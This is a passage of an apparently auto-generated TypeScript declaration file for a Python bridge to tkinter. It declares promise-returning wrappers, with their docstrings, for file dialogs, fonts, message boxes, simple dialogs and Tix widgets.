Promise<any>\n\t\t\tfilter_command(event?): Promise<any>\n\t\t\tfilter_command$({ event }: { event?}): Promise<any>\n\t\t\tget_filter(): Promise<any>\n\t\t\tget_filter$($: {}): Promise<any>\n\t\t\tget_selection(): Promise<any>\n\t\t\tget_selection$($: {}): Promise<any>\n\t\t\tcancel_command(event?): Promise<any>\n\t\t\tcancel_command$({ event }: { event?}): Promise<any>\n\t\t\tset_filter(dir, pat): Promise<any>\n\t\t\tset_filter$({ dir, pat }): Promise<any>\n\t\t\tset_selection(file): Promise<any>\n\t\t\tset_selection$({ file }): Promise<any>\n\t\t\ttitle\n\t\t}\n\n\t\t/**\n\t\t * File selection dialog which checks that the file exists.\n\t\t */\n\t\tinterface ILoadFileDialog extends IFileDialog {\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * File selection dialog which checks that the file may be created.\n\t\t */\n\t\tinterface ISaveFileDialog extends IFileDialog {\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_Dialog {\n\t\t}\n\n\t\t/**\n\t\t * Ask for a filename to open\n\t\t */\n\t\tinterface IOpen extends I_Dialog {\n\t\t\tcommand\n\t\t}\n\n\t\t/**\n\t\t * Ask for a filename to save as\n\t\t */\n\t\tinterface ISaveAs extends I_Dialog {\n\t\t}\n\n\t\t/**\n\t\t * Ask for a directory\n\t\t */\n\t\tinterface IDirectory {\n\t\t}\n\t\tlet dialogstates: Promise<any>\n\t}\n\tmodule font {\n\t\tvar _\n\n\t\t/**\n\t\t * Given the name of a tk named font, returns a Font representation.\n\t\t * \n\t\t */\n\t\tfunction nametofont(name, root?): Promise<any>\n\t\tfunction nametofont$({ name, root }: { name, root?}): Promise<any>\n\n\t\t/**\n\t\t * Get font families (as a tuple)\n\t\t */\n\t\tfunction families(root?, displayof?): Promise<any>\n\t\tfunction families$({ root, displayof }: { root?, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Get names of defined fonts (as a tuple)\n\t\t */\n\t\tfunction names(root?): Promise<any>\n\t\tfunction names$({ root }: { root?}): Promise<any>\n\n\t\t/**\n\t\t * Represents a named font.\n\t\t * \n\t\t * Constructor options are:\n\t\t * \n\t\t * font -- font specifier (name, system font, or (family, size, style)-tuple)\n\t\t * name -- name to use for this font configuration (defaults to a unique name)\n\t\t * exists -- does a named font by this name already exist?\n\t\t * Creates a new named font if False, points to the existing font if True.\n\t\t * Raises _tkinter.TclError if the assertion is false.\n\t\t * \n\t\t * the 
following are ignored if font is specified:\n\t\t * \n\t\t * family -- font 'family', e.g. Courier, Times, Helvetica\n\t\t * size -- font size in points\n\t\t * weight -- font thickness: NORMAL, BOLD\n\t\t * slant -- font slant: ROMAN, ITALIC\n\t\t * underline -- font underlining: false (0), true (1)\n\t\t * overstrike -- font strikeout: false (0), true (1)\n\t\t * \n\t\t * \n\t\t */\n\t\tfunction Font(root?, font?, name?, exists?: boolean): Promise<IFont>\n\t\tfunction Font$({ root, font, name, exists }: { root?, font?, name?, exists?}): Promise<IFont>\n\t\tinterface IFont {\n\n\t\t\t/**\n\t\t\t * Return a distinct copy of the current font\n\t\t\t */\n\t\t\tcopy(): Promise<any>\n\t\t\tcopy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return actual font attributes\n\t\t\t */\n\t\t\tactual(option?, displayof?): Promise<any>\n\t\t\tactual$({ option, displayof }: { option?, displayof?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get font attribute\n\t\t\t */\n\t\t\tcget(option): Promise<any>\n\t\t\tcget$({ option }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Modify font attributes\n\t\t\t */\n\t\t\tconfig(): Promise<any>\n\t\t\tconfig$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return text width\n\t\t\t */\n\t\t\tmeasure(text, displayof?): Promise<any>\n\t\t\tmeasure$({ text, displayof }: { text, displayof?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return font metrics.\n\t\t\t * \n\t\t\t * For best performance, create a dummy widget\n\t\t\t * using this font before calling this method.\n\t\t\t */\n\t\t\tmetrics(): Promise<any>\n\t\t\tmetrics$($: {}): Promise<any>\n\t\t\tcounter\n\t\t\tconfigure\n\t\t}\n\t\tlet NORMAL: Promise<any>\n\t\tlet ROMAN: Promise<any>\n\t\tlet BOLD: Promise<any>\n\t\tlet ITALIC: Promise<any>\n\t\tlet root: Promise<any>\n\t\tlet f: Promise<any>\n\t\tlet w: Promise<any>\n\t\tlet fb: Promise<any>\n\t}\n\tmodule messagebox {\n\t\tvar _\n\n\t\t/**\n\t\t * Show an info message\n\t\t */\n\t\tfunction showinfo(title?, message?): Promise<any>\n\t\tfunction showinfo$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Show a warning message\n\t\t */\n\t\tfunction showwarning(title?, message?): Promise<any>\n\t\tfunction showwarning$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Show an error message\n\t\t */\n\t\tfunction showerror(title?, message?): Promise<any>\n\t\tfunction showerror$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question\n\t\t */\n\t\tfunction askquestion(title?, message?): Promise<any>\n\t\tfunction askquestion$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask if operation should proceed; return true if the answer is ok\n\t\t */\n\t\tfunction askokcancel(title?, message?): Promise<any>\n\t\tfunction askokcancel$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question; return true if the answer is yes\n\t\t */\n\t\tfunction askyesno(title?, message?): Promise<any>\n\t\tfunction askyesno$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question; return true if the answer is yes, None if cancelled.\n\t\t */\n\t\tfunction askyesnocancel(title?, message?): Promise<any>\n\t\tfunction askyesnocancel$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask if operation should be retried; return true if the answer is yes\n\t\t */\n\t\tfunction askretrycancel(title?, message?): Promise<any>\n\t\tfunction askretrycancel$({ title, message }: { title?, message?}): 
Promise<any>\n\n\t\t/**\n\t\t * A message box\n\t\t */\n\t\tinterface IMessage {\n\t\t\tcommand\n\t\t}\n\t\tlet ERROR: Promise<any>\n\t\tlet INFO: Promise<any>\n\t\tlet QUESTION: Promise<any>\n\t\tlet WARNING: Promise<any>\n\t\tlet ABORTRETRYIGNORE: Promise<any>\n\t\tlet OK: Promise<any>\n\t\tlet OKCANCEL: Promise<any>\n\t\tlet RETRYCANCEL: Promise<any>\n\t\tlet YESNO: Promise<any>\n\t\tlet YESNOCANCEL: Promise<any>\n\t\tlet ABORT: Promise<any>\n\t\tlet RETRY: Promise<any>\n\t\tlet IGNORE: Promise<any>\n\t\tlet CANCEL: Promise<any>\n\t\tlet YES: Promise<any>\n\t\tlet NO: Promise<any>\n\t}\n\tmodule scrolledtext {\n\t\tvar _\n\t\tfunction example(): Promise<any>\n\t\tfunction example$($: {}): Promise<any>\n\t\tfunction ScrolledText(master?): Promise<IScrolledText>\n\t\tfunction ScrolledText$({ master }: { master?}): Promise<IScrolledText>\n\t\tinterface IScrolledText {\n\t\t}\n\t}\n\tmodule simpledialog {\n\t\tvar _\n\n\t\t/**\n\t\t * get an integer from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is an integer\n\t\t * \n\t\t */\n\t\tfunction askinteger(title, prompt): Promise<any>\n\t\tfunction askinteger$({ title, prompt }): Promise<any>\n\n\t\t/**\n\t\t * get a float from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is a float\n\t\t * \n\t\t */\n\t\tfunction askfloat(title, prompt): Promise<any>\n\t\tfunction askfloat$({ title, prompt }): Promise<any>\n\n\t\t/**\n\t\t * get a string from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is a string\n\t\t * \n\t\t */\n\t\tfunction askstring(title, prompt): Promise<any>\n\t\tfunction askstring$({ title, prompt }): Promise<any>\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\t\tfunction SimpleDialog(master, text?, buttons?, def?, cancel?, title?, class_?): Promise<ISimpleDialog>\n\t\tfunction SimpleDialog$({ master, text, buttons, def, cancel, title, class_ }: { master, text?, buttons?, def?, cancel?, title?, class_?}): Promise<ISimpleDialog>\n\t\tinterface ISimpleDialog {\n\t\t\tgo(): Promise<any>\n\t\t\tgo$($: {}): Promise<any>\n\t\t\treturn_event(event): Promise<any>\n\t\t\treturn_event$({ event }): Promise<any>\n\t\t\twm_delete_window(): Promise<any>\n\t\t\twm_delete_window$($: {}): Promise<any>\n\t\t\tdone(num): Promise<any>\n\t\t\tdone$({ num }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Class to open dialogs.\n\t\t * \n\t\t * This class is intended as a base class for custom dialogs\n\t\t * \n\t\t */\n\n\t\t/**\n\t\t * Initialize a dialog.\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * parent -- a parent window (the application window)\n\t\t * \n\t\t * title -- the dialog title\n\t\t * \n\t\t */\n\t\tfunction Dialog(parent, title?): Promise<IDialog>\n\t\tfunction Dialog$({ parent, title }: { parent, title?}): Promise<IDialog>\n\t\tinterface IDialog {\n\n\t\t\t/**\n\t\t\t * Destroy the window\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * create dialog body.\n\t\t\t * \n\t\t\t * return widget that should have initial focus.\n\t\t\t * This method should be overridden, and is called\n\t\t\t * by the __init__ method.\n\t\t\t * \n\t\t\t */\n\t\t\tbody(master): 
Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\n\t\t\t/**\n\t\t\t * add standard button box.\n\t\t\t * \n\t\t\t * override if you do not want the standard buttons\n\t\t\t * \n\t\t\t */\n\t\t\tbuttonbox(): Promise<any>\n\t\t\tbuttonbox$($: {}): Promise<any>\n\t\t\tok(event?): Promise<any>\n\t\t\tok$({ event }: { event?}): Promise<any>\n\t\t\tcancel(event?): Promise<any>\n\t\t\tcancel$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * validate the data\n\t\t\t * \n\t\t\t * This method is called automatically to validate the data before the\n\t\t\t * dialog is destroyed. By default, it always validates OK.\n\t\t\t * \n\t\t\t */\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * process the data\n\t\t\t * \n\t\t\t * This method is called automatically to process the data, *after*\n\t\t\t * the dialog is destroyed. By default, it does nothing.\n\t\t\t * \n\t\t\t */\n\t\t\tapply(): Promise<any>\n\t\t\tapply$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryDialog extends IDialog {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t\tbody(master): Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryInteger extends I_QueryDialog {\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t\terrormessage\n\t\t}\n\t\tinterface I_QueryFloat extends I_QueryDialog {\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryString extends I_QueryDialog {\n\t\t\tbody(master): Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t}\n\t}\n\tmodule tix {\n\t\tvar _\n\n\t\t/**\n\t\t * Returns the qualified path name for the widget. Normally used to set\n\t\t * default options for subwidgets. See tixwidgets.py\n\t\t */\n\t\tfunction OptionName(widget): Promise<any>\n\t\tfunction OptionName$({ widget }): Promise<any>\n\t\tfunction FileTypeList(dict): Promise<any>\n\t\tfunction FileTypeList$({ dict }): Promise<any>\n\n\t\t/**\n\t\t * The tix commands provide access to miscellaneous elements\n\t\t * of Tix's internal state and the Tix application context.\n\t\t * Most of the information manipulated by these commands pertains\n\t\t * to the application as a whole, or to a screen or\n\t\t * display, rather than to a particular window.\n\t\t * \n\t\t * This is a mixin class, assumed to be mixed to Tkinter.Tk\n\t\t * that supports the self.tk.call method.\n\t\t * \n\t\t */\n\t\tinterface ItixCommand {\n\n\t\t\t/**\n\t\t\t * Tix maintains a list of directories under which\n\t\t\t * the tix_getimage and tix_getbitmap commands will\n\t\t\t * search for image files. The standard bitmap directory\n\t\t\t * is $TIX_LIBRARY/bitmaps. The addbitmapdir command\n\t\t\t * adds directory into this list. By using this\n\t\t\t * command, the image files of an applications can\n\t\t\t * also be located using the tix_getimage or tix_getbitmap\n\t\t\t * command.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_addbitmapdir(directory): Promise<any>\n\t\t\ttix_addbitmapdir$({ directory }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current value of the configuration\n\t\t\t * option given by option. 
Option may be any of the\n\t\t\t * options described in the CONFIGURATION OPTIONS section.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_cget(option): Promise<any>\n\t\t\ttix_cget$({ option }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the configuration options of the Tix application\n\t\t\t * context. If no option is specified, returns a dictionary all of the\n\t\t\t * available options. If option is specified with no value, then the\n\t\t\t * command returns a list describing the one named option (this list\n\t\t\t * will be identical to the corresponding sublist of the value\n\t\t\t * returned if no option is specified). If one or more option-value\n\t\t\t * pairs are specified, then the command modifies the given option(s)\n\t\t\t * to have the given value(s); in this case the command returns an\n\t\t\t * empty string. Option may be any of the configuration options.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_configure(cnf?): Promise<any>\n\t\t\ttix_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the file selection dialog that may be shared among\n\t\t\t * different calls from this application. This command will create a\n\t\t\t * file selection dialog widget when it is called the first time. This\n\t\t\t * dialog will be returned by all subsequent calls to tix_filedialog.\n\t\t\t * An optional dlgclass parameter can be passed to specified what type\n\t\t\t * of file selection dialog widget is desired. Possible options are\n\t\t\t * tix FileSelectDialog or tixExFileSelectDialog.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_filedialog(dlgclass?): Promise<any>\n\t\t\ttix_filedialog$({ dlgclass }: { dlgclass?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Locates a bitmap file of the name name.xpm or name in one of the\n\t\t\t * bitmap directories (see the tix_addbitmapdir command above). By\n\t\t\t * using tix_getbitmap, you can avoid hard coding the pathnames of the\n\t\t\t * bitmap files in your application. When successful, it returns the\n\t\t\t * complete pathname of the bitmap file, prefixed with the character\n\t\t\t * '@'. The returned value can be used to configure the -bitmap\n\t\t\t * option of the TK and Tix widgets.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_getbitmap(name): Promise<any>\n\t\t\ttix_getbitmap$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Locates an image file of the name name.xpm, name.xbm or name.ppm\n\t\t\t * in one of the bitmap directories (see the addbitmapdir command\n\t\t\t * above). If more than one file with the same name (but different\n\t\t\t * extensions) exist, then the image type is chosen according to the\n\t\t\t * depth of the X display: xbm images are chosen on monochrome\n\t\t\t * displays and color images are chosen on color displays. By using\n\t\t\t * tix_ getimage, you can avoid hard coding the pathnames of the\n\t\t\t * image files in your application. When successful, this command\n\t\t\t * returns the name of the newly created image, which can be used to\n\t\t\t * configure the -image option of the Tk and Tix widgets.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_getimage(name): Promise<any>\n\t\t\ttix_getimage$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Gets the options maintained by the Tix\n\t\t\t * scheme mechanism. 
Available options include:\n\t\t\t * \n\t\t\t * active_bg active_fg bg\n\t\t\t * bold_font dark1_bg dark1_fg\n\t\t\t * dark2_bg dark2_fg disabled_fg\n\t\t\t * fg fixed_font font\n\t\t\t * inactive_bg inactive_fg input1_bg\n\t\t\t * input2_bg italic_font light1_bg\n\t\t\t * light1_fg light2_bg light2_fg\n\t\t\t * menu_font output1_bg output2_bg\n\t\t\t * select_bg select_fg selector\n\t\t\t * \n\t\t\t */\n\t\t\ttix_option_get(name): Promise<any>\n\t\t\ttix_option_get$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Resets the scheme and fontset of the Tix application to\n\t\t\t * newScheme and newFontSet, respectively. This affects only those\n\t\t\t * widgets created after this call. Therefore, it is best to call the\n\t\t\t * resetoptions command before the creation of any widgets in a Tix\n\t\t\t * application.\n\t\t\t * \n\t\t\t * The optional parameter newScmPrio can be given to reset the\n\t\t\t * priority level of the Tk options set by the Tix schemes.\n\t\t\t * \n\t\t\t * Because of the way Tk handles the X option database, after Tix has\n\t\t\t * been imported and inited, it is not possible to reset the color\n\t\t\t * schemes and font sets using the tix config command. Instead, the\n\t\t\t * tix_resetoptions command must be used.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_resetoptions(newScheme, newFontSet, newScmPrio?): Promise<any>\n\t\t\ttix_resetoptions$({ newScheme, newFontSet, newScmPrio }: { newScheme, newFontSet, newScmPrio?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Toplevel widget of Tix which mostly represents the main window\n\t\t * of an application. It has an associated Tcl interpreter.\n\t\t */\n\t\tfunction Tk(screenName?, baseName?, className?): Promise<ITk>\n\t\tfunction Tk$({ screenName, baseName, className }: { screenName?, baseName?, className?}): Promise<ITk>\n\t\tinterface ITk extends ItixCommand {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The Tix Form geometry manager\n\t\t * \n\t\t * Widgets can be arranged by specifying attachments to other widgets.\n\t\t * See Tix documentation for complete details\n\t\t */\n\t\tinterface IForm {\n\t\t\tconfig(cnf?): Promise<any>\n\t\t\tconfig$({ cnf }: { cnf?}): Promise<any>\n\t\t\tcheck(): Promise<any>\n\t\t\tcheck$($: {}): Promise<any>\n\t\t\tforget(): Promise<any>\n\t\t\tforget$($: {}): Promise<any>\n\t\t\tgrid(xsize?, ysize?): Promise<any>\n\t\t\tgrid$({ xsize, ysize }: { xsize?, ysize?}): Promise<any>\n\t\t\tinfo(option?): Promise<any>\n\t\t\tinfo$({ option }: { option?}): Promise<any>\n\t\t\tslaves(): Promise<any>\n\t\t\tslaves$($: {}): Promise<any>\n\t\t\tform\n\t\t}\n\n\t\t/**\n\t\t * A TixWidget class is used to package all (or most) Tix widgets.\n\t\t * \n\t\t * Widget initialization is extended in two ways:\n\t\t * 1) It is possible to give a list of options which must be part of\n\t\t * the creation command (so called Tix 'static' options). These cannot be\n\t\t * given as a 'config' command later.\n\t\t * 2) It is possible to give the name of an existing TK widget. These are\n\t\t * child widgets created automatically by a Tix mega-widget. 
The Tk call\n\t\t * to create these widgets is therefore bypassed in TixWidget.__init__\n\t\t * \n\t\t * Both options are for use by subclasses only.\n\t\t * \n\t\t */\n\t\tfunction TixWidget(master?, widgetName?, static_options?, cnf?, kw?): Promise<ITixWidget>\n\t\tfunction TixWidget$({ master, widgetName, static_options, cnf, kw }: { master?, widgetName?, static_options?, cnf?, kw?}): Promise<ITixWidget>\n\t\tinterface ITixWidget {\n\n\t\t\t/**\n\t\t\t * Set a variable without calling its action routine\n\t\t\t */\n\t\t\tset_silent(value): Promise<any>\n\t\t\tset_silent$({ value }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return the named subwidget (which must have been created by\n\t\t\t * the sub-class).\n\t\t\t */\n\t\t\tsubwidget(name): Promise<any>\n\t\t\tsubwidget$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return all subwidgets.\n\t\t\t */\n\t\t\tsubwidgets_all(): Promise<any>\n\t\t\tsubwidgets_all$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set configuration options for all subwidgets (and self).\n\t\t\t */\n\t\t\tconfig_all(option, value): Promise<any>\n\t\t\tconfig_all$({ option, value }): Promise<any>\n\t\t\timage_create(imgtype, cnf?, master?): Promise<any>\n\t\t\timage_create$({ imgtype, cnf, master }: { imgtype, cnf?, master?}): Promise<any>\n\t\t\timage_delete(imgname): Promise<any>\n\t\t\timage_delete$({ imgname }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Subwidget class.\n\t\t * \n\t\t * This is used to mirror child widgets automatically created\n\t\t * by Tix/Tk as part of a mega-widget in Python (which is not informed\n\t\t * of this)\n\t\t */\n\t\tfunction TixSubWidget(master, name, destroy_physically?, check_intermediate?): Promise<ITixSubWidget>\n\t\tfunction TixSubWidget$({ master, name, destroy_physically, check_intermediate }: { master, name, destroy_physically?, check_intermediate?}): Promise<ITixSubWidget>\n\t\tinterface ITixSubWidget extends ITixWidget {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DisplayStyle - handle configuration options shared by\n\t\t * (multiple) Display Items\n\t\t */\n\t\tfunction DisplayStyle(itemtype, cnf?): Promise<IDisplayStyle>\n\t\tfunction DisplayStyle$({ itemtype, cnf }: { itemtype, cnf?}): Promise<IDisplayStyle>\n\t\tinterface IDisplayStyle {\n\t\t\tdelete(): Promise<any>\n\t\t\tdelete$($: {}): Promise<any>\n\t\t\tconfig(cnf?): Promise<any>\n\t\t\tconfig$({ cnf }: { cnf?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Balloon help widget.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * label Label\n\t\t * message Message\n\t\t */\n\t\tfunction Balloon(master?, cnf?): Promise<IBalloon>\n\t\tfunction Balloon$({ master, cnf }: { master?, cnf?}): Promise<IBalloon>\n\t\tinterface IBalloon extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Bind balloon widget to another.\n\t\t\t * One balloon widget may be bound to several widgets at the same time\n\t\t\t */\n\t\t\tbind_widget(widget, cnf?): Promise<any>\n\t\t\tbind_widget$({ widget, cnf }: { widget, cnf?}): Promise<any>\n\t\t\tunbind_widget(widget): Promise<any>\n\t\t\tunbind_widget$({ widget }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ButtonBox - A container for pushbuttons.\n\t\t * Subwidgets are the buttons added with the add method.\n\t\t * \n\t\t */\n\t\tfunction ButtonBox(master?, cnf?): Promise<IButtonBox>\n\t\tfunction ButtonBox$({ master, cnf }: { master?, cnf?}): Promise<IButtonBox>\n\t\tinterface IButtonBox extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Add a button with given name to box.\n\t\t\t */\n\t\t\tadd(name, 
cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ComboBox - an Entry field with a dropdown menu. The user can select a\n\t\t * choice by either typing in the entry subwidget or selecting from the\n\t\t * listbox subwidget.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * entry Entry\n\t\t * arrow Button\n\t\t * slistbox ScrolledListBox\n\t\t * tick Button\n\t\t * cross Button : present if created with the fancy option\n\t\t */\n\t\tfunction ComboBox(master?, cnf?): Promise<IComboBox>\n\t\tfunction ComboBox$({ master, cnf }: { master?, cnf?}): Promise<IComboBox>\n\t\tinterface IComboBox extends ITixWidget {\n\t\t\tadd_history(str): Promise<any>\n\t\t\tadd_history$({ str }): Promise<any>\n\t\t\tappend_history(str): Promise<any>\n\t\t\tappend_history$({ str }): Promise<any>\n\t\t\tinsert(index, str): Promise<any>\n\t\t\tinsert$({ index, str }): Promise<any>\n\t\t\tpick(index): Promise<any>\n\t\t\tpick$({ index }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Control - An entry field with value change arrows. The user can\n\t\t * adjust the value by pressing the two arrow buttons or by entering\n\t\t * the value directly into the entry. The new value will be checked\n\t\t * against the user-defined upper and lower limits.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * incr Button\n\t\t * decr Button\n\t\t * entry Entry\n\t\t * label Label\n\t\t */\n\t\tfunction Control(master?, cnf?): Promise<IControl>\n\t\tfunction Control$({ master, cnf }: { master?, cnf?}): Promise<IControl>\n\t\tinterface IControl extends ITixWidget {\n\t\t\tdecrement(): Promise<any>\n\t\t\tdecrement$($: {}): Promise<any>\n\t\t\tincrement(): Promise<any>\n\t\t\tincrement$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t\tupdate(): Promise<any>\n\t\t\tupdate$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirList - displays a list view of a directory, its previous\n\t\t * directories and its sub-directories. The user can choose one of\n\t\t * the directories displayed in the list or change to another directory.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * hlist HList\n\t\t * hsb Scrollbar\n\t\t * vsb Scrollbar\n\t\t */\n\t\tfunction DirList(master, cnf?): Promise<IDirList>\n\t\tfunction DirList$({ master, cnf }: { master, cnf?}): Promise<IDirList>\n\t\tinterface IDirList extends ITixWidget {\n\t\t\tchdir(dir): Promise<any>\n\t\t\tchdir$({ dir }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirTree - Directory Listing in a hierarchical view.\n\t\t * Displays a tree view of a directory, its previous directories and its\n\t\t * sub-directories. The user can choose one of the directories displayed\n\t\t * in the list or change to another directory.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * hlist HList\n\t\t * hsb Scrollbar\n\t\t * vsb Scrollbar\n\t\t */\n\t\tfunction DirTree(master, cnf?): Promise<IDirTree>\n\t\tfunction DirTree$({ master, cnf }: { master, cnf?}): Promise<IDirTree>\n\t\tinterface IDirTree extends ITixWidget {\n\t\t\tchdir(dir): Promise<any>\n\t\t\tchdir$({ dir }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirSelectBox - Motif style file select box.\n\t\t * It is generally used for\n\t\t * the user to choose a file. 
FileSelectBox stores the files most\n\t\t * recently selected into a ComboBox widget so that they can be quickly\n\t\t * selected again.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * selection ComboBox\n\t\t * filter ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction DirSelectBox(master, cnf?): Promise<IDirSelectBox>\n\t\tfunction DirSelectBox$({ master, cnf }: { master, cnf?}): Promise<IDirSelectBox>\n\t\tinterface IDirSelectBox extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ExFileSelectBox - MS Windows style file select box.\n\t\t * It provides a convenient method for the user to select files.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * cancel Button\n\t\t * ok Button\n\t\t * hidden Checkbutton\n\t\t * types ComboBox\n\t\t * dir ComboBox\n\t\t * file ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction ExFileSelectBox(master, cnf?): Promise<IExFileSelectBox>\n\t\tfunction ExFileSelectBox$({ master, cnf }: { master, cnf?}): Promise<IExFileSelectBox>\n\t\tinterface IExFileSelectBox extends ITixWidget {\n\t\t\tfilter(): Promise<any>\n\t\t\tfilter$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The DirSelectDialog widget presents the directories in the file\n\t\t * system in a dialog window. The user can use this dialog window to\n\t\t * navigate through the file system to select the desired directory.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * dirbox DirSelectDialog\n\t\t */\n\t\tfunction DirSelectDialog(master, cnf?): Promise<IDirSelectDialog>\n\t\tfunction DirSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IDirSelectDialog>\n\t\tinterface IDirSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ExFileSelectDialog - MS Windows style file select dialog.\n\t\t * It provides a convenient method for the user to select files.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * fsbox ExFileSelectBox\n\t\t */\n\t\tfunction ExFileSelectDialog(master, cnf?): Promise<IExFileSelectDialog>\n\t\tfunction ExFileSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IExFileSelectDialog>\n\t\tinterface IExFileSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * FileSelectBox - Motif style file select box.\n\t\t * It is generally used for\n\t\t * the user to choose a file. 
